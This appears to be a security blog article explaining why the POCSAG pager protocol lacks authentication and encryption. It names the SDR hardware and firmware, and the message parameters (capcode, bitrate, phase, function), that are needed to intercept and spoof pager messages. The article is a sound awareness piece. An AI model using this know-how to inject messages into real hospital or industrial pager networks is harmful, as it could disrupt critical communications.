POCSAG pagers: vulnerable by design
Pagers, or "beepers," are personal communication devices that were highly popular before the advent of mobile phones. They allow users to receive text messages or alerts anytime and anywhere, which revolutionized communication at the time. Today, pagers are less common but still in use, despite security issues due to their simplicity and lack of modern protection measures.
In this article, we will analyze the inherent vulnerabilities in the design of certain protocols used by pagers, such as POCSAG. The use of these insecure protocols, combined with the emergence and democratization of SDR (Software Defined Radio) hardware, forms a dangerous cocktail that, in our view, should prompt a reconsideration of their suitability in critical sectors like healthcare or industry.
How do pager networks work?
A pager network operates by transmitting messages over a radio frequency to devices that are always listening. Each pager has an individual identifier, known as a capcode or RIC (Radio Identification Code), which tells it which messages to receive.
Each pager is programmed to respond to one or more capcodes, determining which messages it should receive and how it should react. This system allows for both individual messaging and broadcasting, where a single message can be sent to multiple devices sharing the same capcode.
However, these networks lack any form of authentication or encryption, meaning messages sent to pagers are transmitted openly. This creates a significant security risk, as anyone with a basic radio transmitter can inject messages into the network simply by knowing the frequency and the capcode.
While this lack of authentication can be useful for quickly setting up personal pager networks, it poses a threat in real-world. For example, attackers could manipulate critical systems like hospital pager networks or industrial control systems, potentially causing severe disruptions.
Types of messages sent to a pager
Pagers allow the reception of multiple types of message. The main ones are:
- Alert Messages: Trigger simple signals like vibrations or audible notifications, often used in emergency situations.
- Numeric Messages: Such as short codes previously agreed upon by service users or phone numbers.
- Alphanumeric Messages: These are the most complex, allowing both text and numbers.
✅ This flexibility makes pager networks useful for sending anything from critical emergency alerts to more detailed instructions or notifications.
How is a POCSAG message composed?
Below, we detail the main parameters required to send a POCSAG message:
- Bitrate: This is the speed at which the message will be transmitted. The most common bit rate for POCSAG transmissions is 1200 bps, although some networks use 512 or 2400 bps.
- Phase: In POCSAG transmissions, there are two possible phase configurations: N and P. This setting determines how the signal is modulated. Most pagers will work with either, but it's essential to match the network's configuration for correct message delivery.
- Type: This determines the message format. You can choose between alert, numeric, or alphanumeric.
- Function: This represents the pager function code. Function codes can trigger different responses, such as sound, vibration, or a specific display mode.
- Message: This field contains the actual body of the message to be transmitted.
✅ To transmit the message, the pager's capcode, which is its unique identifier, is also required. The capcode is usually found on the pager back.
Is spoofing easy in POCSAG? What is needed?
It's surprisingly simple and even inexpensive to do this with basic hardware like the popular HackRF, making it portable through a battery system such as a portapack, often sold together for a price around €200.
Additionally, this hardware can be enhanced with new capabilities using the well-known Mayhem firmware.
With just that, one would have the necessary equipment to intercept communications in a pager network and even inject messages once the network frequency and individual device identifiers have been obtained.
Vulnerability by design
Since POCSAG lacks authentication or encryption for obtaining capcodes for potential subsequent attacks or impersonation (in true wireshark style), one can capture the capcode and frequency by receiving and decoding pager network transmissions using any SDR device capable of listening to and capturing network messages.
Conclusions
In this article, we review how certain messaging protocols like POCSAG, used in pager networks, are inherently insecure due to lack of authentication and encryption. The system treats any correctly formatted transmission as legitimate, making it very easy to spoof a message on the network using readily available and affordable tools.
The design of these protocols, obsolete in terms of security, is a risk in itself. This underscores the need for stronger security measures or to move away from outdated technologies that are still widely used but no longer meet modern security requirements.
____